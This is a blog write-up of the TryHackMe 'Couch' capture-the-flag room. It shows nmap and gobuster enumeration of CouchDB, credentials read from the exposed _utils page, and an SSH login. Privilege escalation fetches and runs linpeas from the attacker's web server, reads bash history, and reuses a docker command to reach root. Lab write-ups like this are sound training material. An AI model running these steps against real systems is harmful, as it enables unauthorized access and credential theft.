Try Hack Me – Couch CTF Writeup

Youtube!

This is my first writeup with a youtube video and its for the Try Hack Me couch room!

You can watch it here or continue reading below!

The Couch Writeup!

So, I decided on the couch room on Try Hack Me (Links at the bottom to the room)

This was an interesting room to complete as it has quite a clever predetermined path to privesc, maybe I just made it harder than I needed to….

Brief

The brief has a few additional steps, I identified 3 and if you follow the writeup you will be able to answer all those. The three I identified were.

  • Find the credentials in the database
  • Identify the User.txt flag
  • Find the Root.txt flag

Starting Out

As always, i started out with an Nmap scan with the following parameters

nmap -sV -sC -p- -oN ./nmap/initial <THM_IP>

These are the results I got;

So no HTTP site on 80 but CouchDB on 5984, sometimes -p- on nmap is worth it!

Lets have a look at that http site on 5984.

Amazing!

2 options now I can either read the CouchDB technical documentation or I can see if Gobuster finds anything.

Lets try Gobuster first using the below;

gobuster dir -u http://<THM_IP>:5984 -w /usr/share/wordlists/dirbuster/big.txt
# if you don't have a big.txt wordlist, you can substitute this for one you have

The results weren’t great……

So, lets amend our Gobuster command to;



gobuster dir -u http://<THM_IP>:5984 -w /usr/share/wordlists/dirbuster/big.txt -b 400,404
# Gobuster normall filters out 404 but if you use -b you have to put 404 back in there or it wont filter those out too

This looks better;

Use the _utils page and we will see whats in the database;

If you click through secret, you will find the credentials you need for Atena.

Atena and Her SSH

So, lets pretend to be Atena by using the below;

ssh atena@<THM_IP>

Obviously, we’re going to ls to see what Atena has in her home directory…..

When you do this, don’t use the | cut -c -6

The user flag is ours!

Let’s Escalate!

So being Atena was great and all, but we need root!

There’s a couple of options out there but I decided to upload linpeas and run it

// Start a webserver in the directory you have linpeas stored, take note of the port
python3 -m http.server

// From the THM Box side
wget http://<Your_THM_IP>:<Your_Webserver_port>/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

So after letting this run a couple of things stood out to me in addition to what linpeas was marking up;

  • Docker was intalled and while not directly vulnerable, its not always on a THM Box
  • Bash history was readable by the user

So lets sneakily read Atena’s history

cat .bash_history

There is a lot in there but that Docker command is interesting so lets copy it and run it!

Docker

So we are now inside a container.

From here i tried to cd to root with no luck so instead i tried the following

cd mnt
ls
cd root
ls
cat root.txt

We have it!

Try Hack Me Couch Conclusion

I did enjoy that box!

Maybe i went round the houses for the Privesc and should have just tried bash history first, but this is where a tool like linpeas really comes into its own because if it wasn’t that then id have been going down a different route.

I hope you enjoyed attempting this room too!

Links

Go to Tryhackme.com for this and many more CTF’s

Room – TryHackMe Couch Room – Thank you to stuxnet for creating this!

Contact me – Any suggestions or room requests, get in touch!